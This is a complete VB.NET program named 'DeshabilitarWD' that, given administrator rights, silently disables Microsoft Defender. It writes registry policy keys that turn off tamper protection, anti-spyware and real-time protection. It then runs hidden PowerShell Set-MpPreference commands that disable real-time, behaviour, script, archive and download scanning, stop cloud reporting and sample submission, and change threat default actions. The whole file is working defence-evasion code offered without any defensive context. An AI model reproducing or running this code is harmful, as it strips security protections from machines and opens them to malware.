Imports System
Imports Microsoft.Win32
Imports System.Diagnostics
Imports System.Security.Principal
Namespace DeshabilitarWD
Class Programa
Private Shared Sub Main()
If Not New WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) Then Return
EditarRegistro("SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0")
EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1")
EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1")
EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", "1")
EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableScanOnRealtimeEnable", "1")
CheckDefender()
End Sub
Private Shared Sub CheckDefender()
Dim proc As Process = New Process With {
.StartInfo = New ProcessStartInfo With {
.FileName = "powershell",
.Arguments = "Get-MpPreference -verbose",
.UseShellExecute = False,
.RedirectStandardOutput = True,
.WindowStyle = ProcessWindowStyle.Hidden,
.CreateNoWindow = True
}
}
proc.Start()
While Not proc.StandardOutput.EndOfStream
Dim line As String = proc.StandardOutput.ReadLine()
If line.Contains("DisableRealtimeMonitoring") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableRealtimeMonitoring $true")
ElseIf line.Contains("DisableBehaviorMonitoring") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableBehaviorMonitoring $true")
ElseIf line.Contains("DisableBlockAtFirstSeen") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableBlockAtFirstSeen $true")
ElseIf line.Contains("DisableIOAVProtection") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableIOAVProtection $true")
ElseIf line.Contains("DisablePrivacyMode") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisablePrivacyMode $true")
ElseIf line.Contains("SignatureDisableUpdateOnStartupWithoutEngine") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true")
ElseIf line.Contains("DisableArchiveScanning") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableArchiveScanning $true")
ElseIf line.Contains("DisableIntrusionPreventionSystem") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableIntrusionPreventionSystem $true")
ElseIf line.Contains("DisableScriptScanning") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableScriptScanning $true")
ElseIf line.Contains("SubmitSamplesConsent") AndAlso Not line.Contains("2") Then
Pwrshll("Set-MpPreference -SubmitSamplesConsent 2")
ElseIf line.Contains("MAPSReporting") AndAlso Not line.Contains("0") Then
Pwrshll("Set-MpPreference -MAPSReporting 0")
ElseIf line.Contains("HighThreatDefaultAction") AndAlso Not line.Contains("6") Then
Pwrshll("Set-MpPreference -HighThreatDefaultAction 6 -Force")
ElseIf line.Contains("ModerateThreatDefaultAction") AndAlso Not line.Contains("6") Then
Pwrshll("Set-MpPreference -ModerateThreatDefaultAction 6")
ElseIf line.Contains("LowThreatDefaultAction") AndAlso Not line.Contains("6") Then
Pwrshll("Set-MpPreference -LowThreatDefaultAction 6")
ElseIf line.Contains("SevereThreatDefaultAction") AndAlso Not line.Contains("6") Then
Pwrshll("Set-MpPreference -SevereThreatDefaultAction 6")
End If
End While
End Sub
Private Shared Sub Pwrshll(ByVal args As String)
Dim proc As Process = New Process With {
.StartInfo = New ProcessStartInfo With {
.FileName = "powershell",
.Arguments = args,
.WindowStyle = ProcessWindowStyle.Hidden,
.CreateNoWindow = True
}
}
proc.Start()
End Sub
Private Shared Sub EditarRegistro(ByVal regPath As String, ByVal name As String, ByVal value As String)
Try
Using key As RegistryKey = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.ReadWriteSubTree)
If key Is Nothing Then
Registry.LocalMachine.CreateSubKey(regPath).SetValue(name, value, RegistryValueKind.DWord)
Return
End If
If key.GetValue(name) <> CObj(value) Then key.SetValue(name, value, RegistryValueKind.DWord)
End Using
Catch
End Try
End Sub
End Class
End Namespace